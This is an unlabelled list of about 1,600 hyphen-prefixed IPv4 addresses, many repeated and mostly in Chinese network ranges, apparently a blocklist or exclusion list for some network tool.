-49.64.188.42 -125.89.32.23 -18.167.166.134 -116.54.81.115 -202.202.1.138 -116.54.81.235 -114.223.76.213 -120.41.151.47 -120.78.14.122 -222.77.102.208 -103.36.90.58 -125.46.3.211 -112.73.81.245 -218.11.132.33 -180.101.105.146 -112.73.81.227 -122.143.203.19 -103.36.90.58 -183.148.233.24 -120.77.252.54 -59.42.90.255 -218.70.111.19 -125.122.8.162 -47.102.110.163 -43.247.68.246 -183.148.233.24 -125.89.32.13 -219.148.25.99 -61.220.249.251 -220.130.187.129 -47.114.110.88 -144.123.27.90 -183.14.78.89 -180.112.169.124 -113.105.203.162 -125.69.90.125 -118.26.166.94 -106.12.146.180 -116.7.74.67 -115.219.0.184 -183.148.235.85 -112.226.15.120 -222.77.100.126 -114.223.78.11 -180.112.171.66 -183.149.255.151 -117.40.9.27 -14.126.204.178 -218.71.136.172 -122.143.203.19 -122.245.81.245 -116.7.72.200 -16.163.156.249 -220.249.21.78 -60.220.238.170 -59.172.37.103 -219.142.105.44 -47.108.90.11 -185.209.40.210 -101.34.48.147 -211.75.183.11 -183.148.235.85 -180.113.43.236 -112.73.81.227 -117.30.222.245 -125.107.151.180 -220.130.187.130 -113.88.124.56 -47.104.21.77 -211.155.228.43 -211.155.228.43 -183.148.237.193 -61.141.139.60 -180.163.175.1 -218.27.6.141 -18.167.42.29 -118.113.146.147 -117.30.223.15 -125.116.40.90 -218.241.213.53 -118.163.165.55 -118.163.165.57 -124.219.70.194 -106.14.159.154 -61.130.247.14 -115.29.64.149 -124.71.62.161 -14.126.207.116 -60.177.242.199 -180.175.153.18 -60.210.117.117 -114.102.185.150 -183.14.76.89 -180.142.178.81 -124.71.56.137 -120.24.64.254 -112.91.83.46 -112.30.213.102 -47.102.220.127 -103.36.90.58 -219.131.221.234 -183.14.79.213 -61.189.223.215 -39.97.237.41 -222.128.26.227 -210.243.86.48 -106.55.9.224 -112.115.17.64 -112.115.17.49 -113.116.124.64 -219.136.186.125 -182.61.130.94 -183.148.227.221 -183.148.227.221 -60.6.202.4 -114.224.143.25 -36.26.207.215 -120.224.18.4 -47.112.198.69 -180.109.39.25 -101.132.34.13 -106.14.186.192 -49.233.82.126 -59.61.118.108 -116.7.73.76 -59.48.144.170 -116.7.72.117 -112.73.81.245 -112.73.81.227 -211.141.192.230 -120.224.18.4 -116.7.72.90 -115.174.67.169 -115.219.5.122 -114.217.115.194 -125.89.32.87 -223.68.139.28 -222.77.103.226 -121.199.14.162 -117.84.209.10 -183.149.238.220 -103.13.247.5 -36.25.165.150 -103.36.90.58 -112.226.15.120 -220.166.241.174 -113.110.203.4 -114.215.84.111 -113.200.57.203 -118.190.211.179 -103.36.90.58 -114.252.238.142 -113.118.72.180 -218.241.213.53 -218.241.236.170 -183.148.232.215 -122.233.8.234 -113.89.234.65 -120.224.18.4 -120.224.18.4 -119.2.3.150 -18.166.68.32 -60.26.83.228 -111.198.137.32 -117.186.236.132 -120.79.14.33 -120.92.169.230 -8.135.39.172 -103.36.90.58 -115.174.67.252 -116.25.135.211 -106.14.10.5 -116.7.72.163 -116.7.75.103 -122.112.245.192 -183.128.148.94 -116.7.73.153 -116.7.72.82 -113.105.203.180 -183.138.132.106 -114.225.23.235 -183.149.251.127 -110.87.25.117 -118.116.127.161 -218.63.77.158 -39.106.129.210 -59.42.90.166 -116.9.30.203 -183.136.120.156 -47.99.215.167 -183.49.45.226 -183.148.226.116 -180.168.192.15 -120.224.18.4 -117.64.147.186 -101.43.56.7 -47.100.187.31 -120.79.164.177 -218.32.11.26 -218.32.11.33 -218.32.11.94 -218.32.11.64 -125.75.126.153 -116.7.75.158 -110.40.156.53 -103.36.90.58 -59.48.144.170 -123.56.95.210 -124.117.211.178 -116.30.196.181 -183.158.25.180 -183.214.181.133 -103.36.90.58 -103.36.90.58 -218.28.244.229 -180.167.145.166 -18.162.153.84 -183.148.239.158 -60.176.61.96 -120.25.150.192 -116.7.73.10 -113.69.137.157 -113.105.203.211 -116.7.75.68 -115.219.77.36 -115.238.97.2 -220.166.242.131 -120.24.252.149 -123.163.54.146 -14.155.221.195 -222.178.41.85 -47.242.196.136 -39.107.61.240 -202.101.109.137 -180.169.248.12 -118.163.155.210 -120.79.156.5 -120.224.18.4 -118.26.166.93 -116.7.72.167 -116.7.72.63 -115.238.146.7 -218.75.24.164 -47.112.0.70 -47.101.56.241 -42.193.99.146 -49.232.160.201 -82.156.9.189 -114.132.199.115 -119.91.225.95 -119.91.223.151 -152.136.149.169 -49.232.24.215 -119.91.199.206 -101.43.13.163 -150.158.21.235 -81.70.166.60 -81.70.54.251 -81.70.164.48 -113.108.255.223 -114.252.235.179 -119.91.23.189 -182.61.130.215 -8.135.1.235 -115.192.83.232 -101.132.177.144 -122.112.245.192 -113.105.201.101 -116.7.72.58 -122.112.245.192 -115.218.124.191 -218.241.213.53 -112.74.212.146 -118.113.146.95 -113.62.191.84 -113.62.191.119 -210.75.20.137 -47.101.61.146 -59.42.231.218 -112.73.81.227 -113.105.201.36 -116.7.75.54 -121.225.64.165 -112.27.60.236 -116.236.205.84 -59.108.91.231 -125.215.157.172 -116.7.72.238 -110.87.24.86 -124.119.14.250 -16.162.46.254 -113.105.202.58 -115.219.72.26 -116.7.75.108 -116.7.72.48 -111.166.240.242 -116.25.132.103 -114.251.49.141 -183.14.77.173 -139.129.204.232 -122.112.245.192 -124.202.169.110 -112.74.162.209 -113.119.8.50 -119.91.209.91 -115.219.4.193 -34.81.233.243 -218.241.213.53 -183.143.8.159 -115.219.74.25 -220.184.242.241 -112.73.81.227 -117.15.213.7 -116.7.74.231 -18.166.213.104 -59.42.62.116 -112.74.61.60 -183.138.142.120 -171.35.128.196 -112.111.6.62 -101.226.171.218 -112.73.81.245 -112.73.81.227 -113.116.126.108 -120.79.225.230 -120.26.199.26 -121.43.182.77 -36.7.191.159 -180.76.124.123 -60.205.176.175 -103.36.90.58 -106.39.229.133 -113.118.72.52 -125.89.35.108 -111.166.243.7 -47.101.52.74 -120.25.73.126 -58.216.51.50 -122.4.214.65 -123.235.152.113 -60.189.125.60 -47.100.218.182 -119.129.113.161 -171.217.59.165 -18.163.49.197 -18.167.173.143 -120.25.103.185 -125.89.34.8 -203.193.50.149 -103.36.90.58 -218.5.2.187 -218.241.213.53 -115.174.67.249 -112.74.112.170 -113.118.73.166 -106.46.169.232 -218.94.21.189 -47.101.60.76 -220.173.140.142 -120.76.135.41 -113.110.203.233 -59.61.118.61 -116.7.74.181 -124.130.130.166 -116.7.75.19 -222.82.134.171 -118.114.243.129 -218.203.161.162 -210.47.17.29 -8.135.28.137 -120.79.175.182 -59.61.122.61 -218.91.48.235 -120.78.212.56 -180.168.67.66 -47.108.75.16 -114.247.50.139 -103.36.90.58 -60.162.161.38 -113.116.219.206 -222.77.100.233 -119.166.244.97 -47.100.45.203 -59.48.129.142 -182.61.130.94 -49.232.8.102 -81.68.78.222 -81.68.199.60 -139.129.200.203 -1.12.227.243 -47.106.128.165 -121.40.82.148 -121.40.57.239 -183.14.77.12 -125.89.34.149 -222.25.177.73 -183.17.231.94 -115.208.228.180 -183.49.86.171 -36.26.229.77 -220.166.242.76 -36.26.231.87 -61.153.30.93 -47.97.211.85 -114.55.28.69 -183.15.88.213 -183.15.125.18 -183.136.127.67 -121.34.49.58 -106.14.144.142 -116.30.198.100 -180.109.37.125 -115.219.4.196 -36.26.230.243 -47.98.151.197 -59.51.114.216 -60.189.116.107 -47.97.67.208 -61.153.254.158 -180.168.67.66 -115.238.97.4 -116.128.228.13 -183.6.178.36 -112.124.29.77 -60.27.196.87 -111.164.181.114 -39.108.68.200 -120.197.146.137 -119.129.116.168 -113.118.75.132 -119.129.115.91 -183.62.67.171 -182.136.222.60 -120.76.239.208 -61.49.250.118 -183.148.231.30 -125.46.30.42 -125.227.177.18 -18.163.113.32 -183.149.236.6 -119.129.112.94 -117.24.78.188 -183.148.225.205 -202.121.151.200 -111.164.186.182 -120.197.148.199 -183.148.226.119 -211.75.23.169 -218.189.221.250 -58.251.74.6 -18.167.69.75 -61.178.16.100 -192.144.235.214 -42.194.178.20 -49.232.212.58 -210.45.98.115 -183.14.79.240 -47.98.40.27 -223.112.4.195 -27.152.126.132 -120.197.145.230 -117.24.79.114 -113.106.103.151 -115.210.93.181 -203.86.8.157 -60.162.23.6 -115.174.67.198 -116.128.228.13 -171.104.120.245 -116.54.81.129 -106.14.10.92 -218.255.25.106 -60.189.126.208 -119.127.17.89 -202.196.96.164 -171.212.109.154 -117.89.94.7 -219.130.221.108 -219.130.221.105 -219.130.221.83 -58.216.51.50 -118.186.244.229 -218.189.221.251 -117.81.63.183 -203.86.8.50 -218.189.221.252 -120.197.145.222 -183.63.231.39 -219.143.237.166 -117.24.139.209 -180.76.47.33 -125.89.35.52 -61.144.254.122 -183.49.47.78 -219.130.221.107 -118.113.146.205 -125.211.59.213 -59.42.90.99 -14.126.205.139 -61.145.231.195 -120.77.3.169 -112.27.91.20 -14.155.223.213 -113.0.135.73 -220.166.242.138 -183.131.137.238 -116.7.72.33 -171.104.121.30 -60.177.244.185 -114.255.169.74 -47.98.191.166 -111.229.114.104 -180.112.226.99 -221.225.61.94 -117.85.142.32 -113.96.111.174 -117.85.142.32 -123.117.115.55 -47.98.40.27 -183.149.237.32 -114.222.246.6 -113.96.111.131 -59.75.105.7 -180.112.170.158 -219.143.237.166 -180.112.170.158 -61.166.162.127 -1.14.240.73 -121.199.55.180 -113.116.126.36 -116.229.198.141 -218.15.34.114 -61.161.221.9 -47.111.148.48 -115.218.124.231 -81.70.245.142 -125.120.253.209 -120.209.105.228 -112.254.88.94 -120.77.22.3 -116.7.74.144 -110.42.163.27 -116.236.254.82 -59.61.122.112 -120.77.4.125 -103.36.90.58 -103.234.81.61 -180.112.168.250 -117.12.155.21 -218.11.132.36 -113.116.127.199 -1.117.43.127 -82.156.210.72 -101.34.162.174 -150.109.42.19 -152.136.127.155 -60.162.23.109 -116.30.196.21 -60.190.198.7 -117.24.139.42 -113.105.201.1 -123.118.93.239 -115.174.67.238 -113.116.124.26 -59.67.167.251 -183.138.178.221 -110.87.24.198 -113.116.125.16 -59.75.105.7 -59.75.105.7 -222.187.11.174 -112.2.13.246 -42.247.35.55 -117.15.64.162 -59.46.170.94 -219.143.237.166 -103.36.90.58 -115.225.22.240 -59.75.105.7 -61.141.203.226 -120.27.194.36 -220.135.89.194 -101.231.158.226 -14.126.204.203 -183.27.182.243 -211.21.128.43 -113.116.45.198 -113.105.202.53 -116.7.72.143 -114.88.152.175 -203.70.237.41 -39.108.173.147 -182.61.131.80 -182.245.143.109 -113.110.202.78 -47.95.245.160 -117.30.222.216 -116.7.74.110 -116.7.75.41 -113.118.75.151 -210.71.232.180 -114.220.127.12 -183.128.146.222 -222.79.37.174 -183.149.252.212 -183.148.239.125 -202.181.238.30 -122.245.82.227 -117.30.222.216 -121.46.248.106 -60.173.37.155 -183.143.169.108 -183.134.118.245 -60.177.247.29 -182.61.131.81 -202.181.238.30 -120.192.218.38 -59.48.144.170 -125.89.33.82 -39.105.119.54 -117.24.77.171 -222.187.11.174 -14.29.188.58 -111.164.195.144 -183.27.180.237 -117.107.147.138 -183.128.147.94 -183.148.231.185 -111.85.91.5 -113.118.73.190 -125.35.4.70 -14.126.207.70 -183.17.231.250 -218.0.168.183 -211.147.247.249 -180.112.168.18 -113.119.8.63 -60.220.238.170 -115.174.67.140 -113.116.1.219 -183.149.231.254 -113.119.8.192 -61.129.182.23 -182.136.210.254 -182.245.143.53 -113.116.126.145 -117.24.77.129 -113.57.160.10 -218.73.32.143 -114.88.152.175 -115.219.75.75 -121.12.253.170 -113.105.200.176 -202.105.104.26 -218.73.61.192 -180.109.32.148 -116.196.85.185 -180.112.229.3 -202.99.122.230 -120.25.24.28 -47.97.77.93 -120.24.83.215 -14.126.206.167 -125.219.111.161 -183.136.119.189 -125.72.13.157 -183.138.133.200 -113.119.8.2 -221.8.8.241 -183.49.47.141 -183.148.227.16 -183.148.227.16 -115.174.67.177 -220.166.243.239 -111.85.91.5 -117.15.214.194 -113.118.18.20 -60.189.123.60 -180.114.144.229 -110.87.25.165 -116.196.112.147 -183.136.127.168 -36.26.227.162 -183.49.47.110 -183.235.205.203 -122.245.81.29 -118.190.217.98 -103.36.90.58 -218.7.208.207 -115.195.56.127 -183.143.11.127 -180.109.124.55 -125.36.238.6 -58.144.7.23 -120.78.174.48 -183.148.233.36 -61.49.58.179 -183.138.173.203 -123.119.0.169 -123.157.218.11 -120.27.197.181 -113.105.202.211 -47.99.187.96 -47.99.111.21 -183.49.86.219 -120.41.151.183 -112.115.17.91 -112.115.17.24 -221.223.150.169 -219.139.106.174 -54.223.16.217 -183.14.78.118 -60.176.11.61 -58.39.218.252 -123.119.4.94 -103.36.90.54 -121.28.103.210 -182.150.168.146 -183.49.45.182 -117.85.142.109 -116.54.57.90 -111.204.110.106 -117.82.137.72 -47.101.216.147 -59.75.105.7 -111.164.185.12 -58.213.155.25 -120.24.64.169 -117.12.156.36 -123.155.65.85 -59.42.60.146 -183.2.142.152 -103.36.90.58 -103.36.90.58 -116.236.78.87 -112.74.100.213 -115.208.230.42 -121.235.93.135 -183.148.239.223 -118.190.217.98 -123.117.116.6 -106.122.199.167 -119.181.179.38 -220.166.243.61 -112.26.98.168 -117.131.6.178 -59.56.32.133 -122.245.87.203 -101.70.68.22 -115.218.122.164 -113.108.103.186 -221.130.161.49 -111.164.174.125 -218.15.34.145 -182.42.109.217 -106.12.241.133 -106.12.241.132 -106.12.241.131 -211.103.34.181 -122.230.245.114 -113.105.202.155 -61.189.156.205 -120.224.18.4 -221.179.119.18 -125.89.32.104 -220.166.243.205 -117.8.64.8 -113.118.18.158 -171.223.86.99 -112.14.163.62 -125.89.34.160 -113.118.72.134 -113.81.202.112 -112.255.83.8 -180.112.28.91 -183.14.76.11 -113.88.124.31 -218.16.249.227 -49.77.43.144 -183.138.176.245 -118.31.217.73 -14.155.222.2 -124.47.10.36 -218.241.213.53 -221.179.119.18 -113.105.200.214 -123.155.64.119 -124.70.180.3 -118.113.147.220 -113.110.202.160 -211.152.55.133 -61.178.68.138 -115.219.232.92 -58.37.230.86 -220.179.92.120 -220.189.235.74 -183.158.25.90 -220.160.201.110 -60.189.105.156 -103.36.90.58 -120.25.94.32 -183.148.58.137 -113.88.121.150 -116.62.60.69 -113.103.39.126 -123.56.21.234 -111.21.38.68 -115.202.51.36 -116.7.75.252 -113.105.203.246 -58.216.51.50 -125.89.32.231 -36.26.231.243 -180.112.228.210 -120.76.215.97 -14.126.204.247 -183.15.205.77 -106.12.241.131 -183.148.238.68 -116.54.94.174 -182.245.143.180 -113.92.167.17 -211.103.34.181 -123.56.21.234 -114.245.76.237 -203.166.162.137 -211.103.34.181 -103.13.247.5 -14.215.50.132 -61.220.34.25 -1.117.180.234 -103.36.90.58 -119.144.15.37 -58.240.170.2 -115.202.51.203 -121.46.4.81 -120.224.87.72 -210.5.145.195 -121.8.145.133 -101.70.73.46 -183.27.183.148 -59.42.89.233 -101.70.73.46 -49.72.213.248 -59.75.105.7 -58.37.230.86 -116.54.81.106 -116.7.74.61 -183.49.45.67 -59.42.61.22 -113.88.141.76 -211.152.55.134 -39.75.209.80 -182.61.130.215 -120.236.240.100 -103.36.90.58 -183.17.230.68 -183.148.44.2 -61.172.215.12 -125.46.3.211 -222.243.160.70 -202.201.2.158 -202.189.1.122 -113.118.17.19 -123.56.21.234 -124.64.101.23 -43.240.92.14 -112.74.27.18 -218.241.213.53 -113.116.171.119 -183.148.232.38 -14.215.50.132 -113.119.8.17 -119.129.113.18 -60.162.19.2 -59.42.62.11 -116.7.72.96 -183.138.181.10 -218.203.162.50 -116.1.201.172 -183.167.246.147 -59.57.251.137 -119.181.235.32 -61.54.187.109 -61.54.187.107 -221.226.192.63 -114.220.93.195 -119.6.96.135 -183.17.229.146 -220.166.242.172 -58.212.30.52 -125.69.92.159 -14.155.220.75 -61.189.223.215 -222.85.25.84 -211.103.34.181 -218.24.173.4 -113.90.176.255 -220.166.241.2 -113.116.124.23 -218.28.244.22 -218.241.213.56 -112.244.38.247 -112.74.51.125 -120.25.60.43 -116.7.72.62 -112.74.65.25 -61.145.61.33 -183.14.77.229 -183.149.238.87 -122.206.91.155 -117.48.195.24 -113.116.125.197 -218.203.194.230 -202.100.92.37 -117.48.195.28 -115.174.67.57 -58.212.30.60 -60.162.162.20 -183.138.160.189 -110.64.48.131 -183.149.254.72 -171.104.120.242 -221.226.115.13 -113.105.200.213 -218.22.168.139 -218.69.104.210 -222.168.23.201 -60.25.194.214 -180.112.226.53 -120.79.0.3 -111.164.178.26 -125.75.126.153 -218.56.1.207 -60.210.111.227 -183.156.233.41 -60.164.173.189 -113.104.206.120 -118.116.41.197 -45.116.141.54 -117.30.222.115 -113.90.135.189 -59.46.134.168 -211.103.34.181 -183.148.224.35 -52.81.4.50 -113.88.106.93 -36.26.206.205 -218.63.171.5 -118.186.244.188 -183.240.86.125 -103.36.90.58 -183.27.181.174 -113.116.171.72 -113.105.201.105 -113.103.39.240 -218.85.221.12 -218.93.19.10 -183.149.230.27 -183.149.246.239 -60.188.196.150 -116.7.73.54 -47.92.142.239 -117.88.192.138 -120.25.126.95 -183.131.143.229 -103.36.90.58 -117.24.136.65 -58.213.181.154 -183.138.137.208 -183.49.47.220 -117.82.26.23 -120.193.71.201 -59.48.144.170 -183.15.207.124 -120.42.46.54 -111.164.174.38 -58.246.19.139 -120.24.236.227 -117.48.195.26 -117.48.195.27 -117.48.195.25 -59.48.144.170 -218.75.199.212 -125.46.30.42 -113.116.88.67 -101.132.148.65 -113.88.103.164 -59.75.8.197 -14.155.221.44 -180.112.231.83 -183.138.181.232 -59.56.32.169 -61.153.30.44 -45.116.141.54 -183.143.27.234 -117.28.224.67 -218.76.255.70 -120.202.251.72 -125.89.69.202 -171.104.120.121 -116.7.74.179 -60.189.108.233 -60.162.19.201 -119.166.247.30 -61.185.19.48 -101.70.66.208 -183.249.114.229 -47.114.51.60 -223.111.249.76 -120.78.227.151 -220.166.241.106 -113.102.145.144 -14.155.221.244 -222.184.54.100 -59.42.62.38 -117.82.178.97 -219.139.35.84 -61.149.244.38 -113.116.88.132 -211.142.150.211 -1.15.126.28 -112.225.224.140 -14.126.207.42 -183.156.237.89 -218.65.220.13 -113.16.135.204 -113.118.72.13 -218.17.138.227 -116.7.75.169 -220.184.121.105 -223.75.59.113 -61.157.34.100 -61.174.150.232 -113.119.8.64 -14.126.204.246 -113.90.177.165 -211.149.134.3 -36.26.224.197 -49.65.164.28 -113.116.171.83 -125.89.32.131 -183.138.153.173 -113.116.89.217 -36.26.225.159 -119.181.183.3 -117.141.240.122 -112.73.81.245 -14.155.221.208 -113.105.201.186 -113.110.203.220 -183.14.79.109 -183.136.103.162 -60.189.112.140 -115.174.67.109 -203.166.162.136 -59.44.204.190 -14.126.207.141 -211.152.55.131 -113.118.74.47 -42.123.124.195 -113.90.176.46 -118.114.96.121 -61.143.46.94 -183.149.238.212 -111.198.128.133 -218.76.35.182 -113.81.200.244 -60.162.165.6 -14.17.69.135 -183.14.79.27 -112.90.146.203 -61.142.73.72 -115.174.67.78 -60.189.116.216 -183.159.111.212 -103.36.90.58 -39.75.68.174 -59.42.88.12 -123.119.10.65 -115.174.67.24 -101.6.208.3 -180.109.37.183 -113.106.199.148 -113.77.160.154 -60.248.93.252 -124.160.68.118 -47.94.164.182 -39.98.127.79 -60.248.93.252 -182.150.110.24 -36.25.126.247 -113.113.82.72 -60.2.96.129 -113.116.171.190 -125.89.34.150 -123.150.46.220 -183.143.93.246 -183.14.76.117 -60.189.127.130 -218.28.75.29 -14.126.206.23 -116.24.66.143 -112.115.17.126 -183.49.47.136 -114.248.211.178 -118.163.232.138 -183.240.87.132 -183.167.243.237 -39.75.189.225 -218.95.46.69 -115.219.5.191 -60.173.116.136 -115.174.67.18 -58.213.123.218 -59.42.62.162 -58.212.35.114 -211.79.206.57 -119.191.6.82 -113.110.166.118 -220.191.70.249 -115.174.67.51 -122.230.252.128 -183.14.79.33 -218.10.43.41 -59.42.91.208 -183.49.46.109 -60.189.116.89 -183.15.88.96 -182.149.71.73 -58.221.232.34 -116.54.81.31 -182.150.170.66 -101.229.74.36 -61.161.132.139 -183.62.208.142 -211.79.206.59 -211.79.206.88 -218.108.113.79 -60.189.109.189 -113.89.32.71 -40.73.79.9 -116.7.73.3 -183.138.157.191 -14.17.103.104 -125.118.16.57 -60.2.200.18 -47.107.147.32 -61.141.139.150 -40.73.119.155 -211.152.55.132 -116.30.199.243 -49.66.180.95 -211.99.97.120 -113.88.141.9 -125.89.32.227 -116.7.72.36 -111.193.177.133 -113.90.177.71 -113.105.201.255 -125.72.125.200 -36.26.230.19 -113.102.147.181 -59.42.61.185 -60.162.162.130 -125.89.35.190 -203.166.162.131 -221.130.159.75 -124.227.108.237 -222.80.156.146 -113.116.125.220 -115.222.111.36 -119.129.115.214 -114.248.216.157 -183.149.244.153 -113.105.200.196 -183.148.43.220 -49.233.15.180 -116.7.72.185 -220.166.241.69 -120.211.11.90 -61.222.122.83 -106.122.199.239 -111.164.190.4 -114.55.250.251 -183.49.45.254 -115.203.198.205 -183.27.182.186 -61.129.182.44 -116.30.196.89 -119.136.114.112 -183.148.229.236 -112.90.146.204 -123.155.67.127 -171.104.121.43 -183.149.245.193 -218.206.146.131 -112.115.17.43 -124.42.239.136 -123.120.147.168 -123.56.114.126 -116.30.197.237 -119.129.130.32 -223.82.107.28 -123.155.67.127 -116.7.73.206 -115.29.64.149 -58.240.99.166 -221.226.195.236 -116.25.36.205 -119.129.119.111 -183.27.180.53 -125.126.218.229 -111.193.174.146 -103.36.90.58 -112.29.232.191 -113.116.1.119 -111.39.28.69 -115.218.122.225 -125.107.154.7 -59.42.91.53 -120.253.115.105 -115.203.99.219 -113.104.206.5 -221.131.111.190 -116.7.74.161 -119.190.116.109 -218.242.70.214 -120.209.31.25 -123.234.222.165 -123.155.65.216 -125.126.207.209 -122.243.155.246 -60.2.96.129 -118.122.225.14 -120.115.146.231 -112.226.14.88 -61.166.162.184 -101.200.145.197 -171.104.120.132 -60.191.106.165 -61.166.162.39 -211.99.97.120 -111.164.188.20 -47.107.146.207 -117.141.80.44 -116.24.67.4 -183.49.86.73 -117.81.34.173 -119.136.112.21 -183.136.108.185 -112.4.234.19 -123.110.194.36 -183.49.46.161 -183.143.90.115 -183.233.206.10 -125.120.240.205 -123.155.65.216 -121.196.181.135 -183.148.237.121 -125.89.34.124 -193.112.72.248 -113.88.250.42 -220.166.243.159 -113.88.253.128 -27.184.34.12 -18.162.232.79 -18.167.69.187 -81.68.242.187 -59.42.89.168 -49.77.43.227 -18.166.210.165 -18.162.191.93 -18.167.126.0 -18.163.214.91 -18.167.51.65 -18.163.24.191 -18.163.194.125 -18.167.134.145 -115.221.143.219 -115.219.5.90 -121.196.53.26 -218.22.41.234 -183.138.189.214 -180.169.69.238 -211.23.119.168 -119.129.118.74 -218.108.113.79 -60.178.88.146 -125.113.190.143 -125.89.32.90 -61.186.155.27 -36.26.224.235 -113.105.200.24 -115.29.245.73 -183.158.29.89 -27.195.37.163 -125.89.33.151 -218.0.168.79 -125.113.181.70 -183.148.228.234 -59.75.8.103 -117.13.46.253 -111.26.164.22 -111.26.164.22 -60.208.107.234 -59.42.90.247 -103.36.90.59 -223.220.175.66 -222.247.47.212 -116.54.57.118 -59.46.134.166 -202.206.64.232 -101.70.70.39 -111.26.164.22 -180.152.157.50 -111.26.164.22 -111.14.46.29 -111.26.164.22 -111.26.164.22 -113.116.148.117 -111.26.164.22 -219.146.7.42 -59.56.32.118 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -113.116.89.50 -111.26.164.22 -111.26.164.22 -103.36.90.54 -111.26.164.22 -121.37.152.76 -59.56.32.160 -119.129.119.158 -119.129.115.17 -113.118.75.21 -113.88.251.51 -116.7.72.165 -111.26.164.22 -111.26.164.22 -115.219.5.247 -111.26.164.22 -111.26.164.22 -112.255.74.160 -218.245.4.3 -111.26.164.22 -111.26.164.22 -183.138.151.76 -111.26.164.22 -111.26.164.22 -115.221.142.106 -111.26.164.22 -111.26.164.22 -116.7.74.160 -111.39.139.154 -111.26.164.22 -183.149.252.174 -111.26.164.22 -220.169.109.13 -183.27.182.109 -111.26.164.22 -111.26.164.22 -112.254.90.184 -111.26.164.22 -202.206.64.204 -121.17.172.121 -111.26.164.22 -61.166.162.88 -120.76.21.132 -111.26.164.22 -111.26.164.22 -111.26.164.22 -183.27.180.219 -222.217.19.251 -111.26.164.22 -111.26.164.22 -121.42.55.186 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -121.235.93.132 -115.202.45.132 -111.26.164.22 -112.115.17.246 -111.26.164.22 -14.215.109.168 -114.245.74.118 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -115.174.67.86 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -183.149.233.145 -115.221.142.113 -111.26.164.22 -183.143.5.124 -111.26.164.22 -111.26.164.22 -111.26.164.22 -45.125.10.107 -111.26.164.22 -111.26.164.22 -125.119.26.65 -111.26.164.22 -111.26.164.22 -123.234.175.187 -125.71.149.236 -111.26.164.22 -113.110.201.223 -111.26.164.22 -14.155.220.68 -111.20.104.169 -111.26.164.22 -60.191.15.194 -111.26.164.22 -111.26.164.22 -111.26.164.22 -220.184.242.35 -119.129.131.15 -47.107.95.216 -113.105.201.25 -220.184.241.65 -111.26.164.22 -122.245.85.112 -221.5.152.51 -111.26.164.22 -125.89.69.202 -222.210.185.196 -111.26.164.22 -113.110.203.35 -111.26.164.22 -111.26.164.22 -210.13.193.38 -111.26.164.22 -183.143.24.202 -124.235.195.61 -221.7.151.131 -61.157.34.242 -111.26.164.22 -111.26.164.22 -111.26.164.22 -121.18.68.218 -121.18.68.216 -121.18.68.217 -101.231.0.84 -111.26.164.22 -110.88.153.92 -110.88.153.192 -110.88.153.34 -111.26.164.22 -222.212.185.29 -111.26.164.22 -220.201.207.167 -111.26.164.22 -111.26.164.22 -123.155.65.127 -111.26.164.22 -123.155.65.127 -111.26.164.22 -222.134.46.62 -111.26.164.22 -60.26.115.103 -111.26.164.22 -111.26.164.22 -113.88.250.108 -112.255.12.90 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.21.38.68 -125.69.90.126 -111.198.128.151 -111.26.164.22 -219.238.169.252 -111.26.164.22 -221.223.137.65 -118.114.243.129 -218.253.202.75 -60.14.44.100 -58.254.177.254 -183.64.214.57 -111.26.164.22 -111.26.164.22 -171.106.48.55 -111.26.164.22 -111.26.164.22 -218.88.40.7 -101.229.77.108 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -120.27.24.49 -60.189.103.206 -47.107.95.123 -211.141.217.202 -61.189.56.226 -222.85.106.125 -111.26.164.22 -111.26.164.22 -111.26.164.22 -59.50.104.81 -171.221.204.28 -123.155.69.154 -111.26.164.22 -14.155.222.144 -101.89.165.21 -111.26.164.22 -111.26.164.22 -122.245.85.190 -111.26.164.22 -111.26.164.22 -120.27.24.49 -111.26.164.22 -111.26.164.22 -125.89.65.59 -111.26.164.22 -111.26.164.22 -115.174.67.2 -111.26.164.22 -116.25.134.152 -125.89.35.145 -111.26.164.22 -112.255.13.33 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -182.245.143.93 -218.5.98.137 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -106.122.199.3 -111.26.164.22 -59.46.68.209 -116.7.72.234 -111.21.38.77 -111.26.164.22 -60.251.253.42 -113.118.16.42 -111.26.164.22 -111.26.164.22 -183.143.29.17 -116.7.72.97 -115.174.67.11 -210.202.209.18 -111.26.164.22 -111.26.164.22 -61.166.162.2 -111.26.164.22 -61.129.71.53 -218.9.55.205 -125.122.108.143 -112.255.71.243 -61.189.223.215 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -120.209.8.188 -111.26.164.22 -115.195.58.21 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -116.128.228.13 -111.26.164.22 -222.177.25.172 -183.148.233.183 -153.0.162.1 -111.26.164.22 -115.222.110.251 -111.26.164.22 -61.184.25.178 -111.26.164.22 -111.26.164.22 -115.202.61.46 -183.203.220.123 -124.165.218.213 -202.65.215.236 -113.87.162.140 -111.26.164.22 -111.26.164.22 -111.26.164.22 -59.153.93.82 -59.153.93.72 -111.26.164.22 -124.165.218.213 -111.26.164.22 -59.75.8.103 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -59.153.93.83 -59.153.93.86 -59.153.93.69 -106.55.164.180 -117.115.103.229 -112.27.114.102 -180.109.124.147 -116.7.74.249 -112.27.156.182 -183.128.147.136 -111.26.164.22 -58.250.88.14 -58.214.238.134 -61.141.65.66 -61.177.123.170 -211.144.105.114 -115.222.111.83 -47.107.170.42 -203.95.2.50 -122.245.87.230 -183.223.139.208 -115.221.138.42 -125.122.108.118 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -111.26.164.22 -219.148.89.89 -115.207.204.160 -218.0.174.179 -183.27.180.244 -111.26.164.22 -111.26.164.22 -122.227.47.162 